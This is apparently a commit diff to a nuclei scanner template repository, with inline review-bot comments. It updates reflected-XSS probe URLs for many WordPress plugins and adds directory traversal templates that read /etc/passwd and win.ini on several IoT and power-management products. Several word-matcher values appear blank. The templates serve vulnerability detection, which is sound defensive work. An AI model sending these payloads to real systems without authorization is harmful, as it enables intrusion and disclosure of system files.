matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2017-9288.yaml b/CVE-2017-9288.yaml
index 19bdc03..da92a85 100644
--- a/CVE-2017-9288.yaml
+++ b/CVE-2017-9288.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+ - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2018-11709.yaml b/CVE-2018-11709.yaml
index 4f305a6..b71a582 100644
--- a/CVE-2018-11709.yaml
+++ b/CVE-2018-11709.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2018-12031.yaml b/CVE-2018-12031.yaml
new file mode 100755
index 0000000..0fc4b18
--- /dev/null
+++ b/CVE-2018-12031.yaml
@@ -0,0 +1,30 @@
+id: CVE-2018-12031
+
+info:
+ name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
+ reference: |
+ - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+ - https://www.exploit-db.com/exploits/48614
+ tags: cve,cve2018,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
+ - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[0*]:0:0"
+ - "\\[(font|extension|file)s\\]"
+ condition: or
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-16059.yaml b/CVE-2018-16059.yaml
new file mode 100755
index 0000000..d907c47
--- /dev/null
+++ b/CVE-2018-16059.yaml
@@ -0,0 +1,27 @@
+id: CVE-2018-16059
+
+info:
+ name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
+ - https://www.exploit-db.com/exploits/45342
+ tags: cve,cve2018,iot,lfi
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/fcgi-bin/wgsetcgi"
+ body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-20462.yaml b/CVE-2018-20462.yaml
index 79a0cbd..a7af377 100644
--- a/CVE-2018-20462.yaml
+++ b/CVE-2018-20462.yaml
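Review bot: The first regex in CVE-2018-12031, `root:[0*]:0:0`, has a character class of `0` or `*`, so the usual `root:x:0:0` line of /etc/passwd does not match and the Linux path of this template can only fire on the `*` form; the other traversal templates in this commit (CVE-2009-1558, CVE-2018-16059) use `root:[x*]:0:0`, which is almost certainly what was intended: `- "root:[x*]:0:0"`. With `condition: or` the Windows `\\[(font|extension|file)s\\]` regex still rescues the template on Windows hosts, which would hide the typo if it was only tested against a Windows instance.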
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+ - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2018-5316.yaml b/CVE-2018-5316.yaml
index 7553a25..13f88cb 100644
--- a/CVE-2018-5316.yaml
+++ b/CVE-2018-5316.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2019-15713.yaml b/CVE-2019-15713.yaml
index 55c9e48..311cc6e 100644
--- a/CVE-2019-15713.yaml
+++ b/CVE-2019-15713.yaml
@@ -13,13 +13,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+ - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2019-16332.yaml b/CVE-2019-16332.yaml
index f067dd1..7a1a0b7 100644
--- a/CVE-2019-16332.yaml
+++ b/CVE-2019-16332.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - ""
+ - ""
part: body
- type: word
diff --git a/CVE-2019-16525.yaml b/CVE-2019-16525.yaml
new file mode 100755
index 0000000..c2ccc90
--- /dev/null
+++ b/CVE-2019-16525.yaml
@@ -0,0 +1,30 @@
+id: CVE-2019-16525
+
+info:
+ name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2019-19134.yaml b/CVE-2019-19134.yaml
index 5aeed95..89c923f 100644
--- a/CVE-2019-19134.yaml
+++ b/CVE-2019-19134.yaml
@@ -11,13 +11,13 @@ info:
requests:
- method: GET
path:
- - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E'
+ - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- - 'foo">'
+ - 'foo">'
part: body
- type: word
diff --git a/CVE-2019-20085.yaml b/CVE-2019-20085.yaml
new file mode 100755
index 0000000..1c31973
--- /dev/null
+++ b/CVE-2019-20085.yaml
@@ -0,0 +1,26 @@
+id: CVE-2019-20085
+
+info:
+ name: TVT NVMS 1000 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
+ - https://www.exploit-db.com/exploits/48311
+ tags: cve,cve2019,iot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "\\[(font|extension|file)s\\]"
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2020-12054.yaml b/CVE-2020-12054.yaml
index e937c8a..60bcb22 100644
--- a/CVE-2020-12054.yaml
+++ b/CVE-2020-12054.yaml
@@ -18,7 +18,9 @@ requests:
- type: word
words:
- ""
+ - "catch-breadcrumb"
part: body
+ condition: and
- type: word
part: header
@@ -27,4 +29,4 @@ requests:
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/CVE-2020-17362.yaml b/CVE-2020-17362.yaml
index 2e265da..f448fae 100644
--- a/CVE-2020-17362.yaml
+++ b/CVE-2020-17362.yaml
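Review bot: The second CVE-2020-12054 hunk replaces `- 200` with the same `- 200` but without a trailing newline (`\ No newline at end of file`), so its only effect is to strip the file's final newline; that shows up as noise in every later diff and trips most YAML linters, so keep the newline and drop this hunk. The first hunk's `"catch-breadcrumb"` word plus `condition: and` is a sound way to tie the reflected payload to the vulnerable theme rather than to any site that echoes the query string. CVE-2020-17362 adds its `"nova-lite"` fingerprint as a separate word matcher instead, which behaves the same under `matchers-condition: and`, but the two files should settle on one style.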
@@ -11,13 +11,18 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E'
+ - '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "nova-lite"
 part: body
 - type: word
diff --git a/CVE-2021-24298.yaml b/CVE-2021-24298.yaml
index b57d43a..40b4fa6 100644
--- a/CVE-2021-24298.yaml
+++ b/CVE-2021-24298.yaml
@@ -11,13 +11,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E'
+ - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/CVE-2021-24320.yaml b/CVE-2021-24320.yaml
index 42d9616..27ed4e2 100644
--- a/CVE-2021-24320.yaml
+++ b/CVE-2021-24320.yaml
@@ -11,13 +11,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E'
+ - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/CVE-2021-24335.yaml b/CVE-2021-24335.yaml
index ea7b581..960dfbe 100644
--- a/CVE-2021-24335.yaml
+++ b/CVE-2021-24335.yaml
@@ -11,13 +11,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
+ - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/CVE-2021-24389.yaml b/CVE-2021-24389.yaml
index e8b37ed..3b6b1bb 100644
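Review bot: In the CVE-2020-17362 hunk the theme fingerprint is added as a separate `- type: word` matcher with `words: - "nova-lite"`, whereas the CVE-2020-12054 hunk in the same commit adds its `catch-breadcrumb` fingerprint as a second word inside the existing body matcher with `condition: and`; both behave the same under `matchers-condition: and`, but the two templates should use one form so later edits do not have to learn two conventions. Adding the fingerprint is the right call for a probe on `/?s=`, since the search page of any theme that echoes the query would otherwise satisfy the reflection match alone. A short comment above the fingerprint matcher, `# theme fingerprint: keeps other themes that echo ?s= from matching`, would record why it is there.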
--- a/CVE-2021-24389.yaml
+++ b/CVE-2021-24389.yaml
@@ -11,13 +11,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3E%3Cscript%3Eprompt(123)%3C/script%3E'
+ - '{{BaseURL}}/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-church-admin-xss.yaml b/wp-church-admin-xss.yaml
index 1b5fa99..f5c5957 100644
--- a/wp-church-admin-xss.yaml
+++ b/wp-church-admin-xss.yaml
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
+ - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-custom-tables-xss.yaml b/wp-custom-tables-xss.yaml
index d29132c..c0918d7 100644
--- a/wp-custom-tables-xss.yaml
+++ b/wp-custom-tables-xss.yaml
@@ -11,13 +11,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-finder-xss.yaml b/wp-finder-xss.yaml
index c2141ac..1bbd462 100644
--- a/wp-finder-xss.yaml
+++ b/wp-finder-xss.yaml
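Review bot: In the wp-church-admin-xss hunk the old path carried `alert%28'{{randstr}}'%29`, a per-run random marker, and the new one replaces it with the fixed `alert%28document.domain%29` string that every template in this commit now shares; with a constant marker, any response that already contains that literal (cached output from an earlier scan, a WAF or error page that echoes the request, a different plugin reflecting the same parameter) satisfies the body word match, so the random element was a useful false-positive guard and this hunk removes it without replacement. If uniformity is the goal, keep a `{{randstr}}` component inside the shared payload and match on it, which as far as I know nuclei expands identically in `path` and in `words`; verify that before relying on it. This applies to the other XSS templates in the commit too, but only this one previously had the guard.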
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3Cscript%3Ealert(123);%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-flagem-xss.yaml b/wp-flagem-xss.yaml
index bcd78b1..90505bc 100644
--- a/wp-flagem-xss.yaml
+++ b/wp-flagem-xss.yaml
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-knews-xss.yaml b/wp-knews-xss.yaml
index 198ba8e..9b0815e 100644
--- a/wp-knews-xss.yaml
+++ b/wp-knews-xss.yaml
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E '
+ - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-nextgen-xss.yaml b/wp-nextgen-xss.yaml
index 30f3806..e4b63e6 100644
--- a/wp-nextgen-xss.yaml
+++ b/wp-nextgen-xss.yaml
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-phpfreechat-xss.yaml b/wp-phpfreechat-xss.yaml
index 986f908..c908448 100644
--- a/wp-phpfreechat-xss.yaml
+++ b/wp-phpfreechat-xss.yaml
@@ -10,13 +10,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-slideshow-xss.yaml b/wp-slideshow-xss.yaml
index 41649c2..61a03ab 100644
--- a/wp-slideshow-xss.yaml
+++ b/wp-slideshow-xss.yaml
@@ -10,16 +10,16 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%22%3B%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
- - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 words:
- - ""
+ - ""
 part: body
 - type: word
diff --git a/wp-socialfit-xss.yaml b/wp-socialfit-xss.yaml
index 50082d8..3da8d47 100644
--- a/wp-socialfit-xss.yaml
+++ b/wp-socialfit-xss.yaml
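Review bot: In the wp-slideshow-xss hunk three of the four paths survive only as `#`-commented lines at column 0 inside the `path:` sequence, still carrying the old `alert%28123%29` marker that the rest of the commit retires; commented-out probes are dead data that drift out of date, so either delete them or, if those endpoints still reflect, restore them as live entries with the same marker as the first path. If they were disabled because they no longer reflect or produced false positives, record that in one comment above the list, `# only randomId is probed; the slides[]/settings[] parameters were dropped because …`, instead of keeping the URLs. The remaining path also lost its `%22%3B%3E` prefix; the original author presumably needed `";>` for the context `randomId` is echoed into, so confirm the new payload still reflects there before merging.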
@@ -13,13 +13,13 @@ info:
 requests:
 - method: GET
 path:
- - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E'
+ - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 matchers-condition: and
 matchers:
 - type: word
 part: body
 words:
- - ''
+ - ''
 - type: word
 part: header
 words: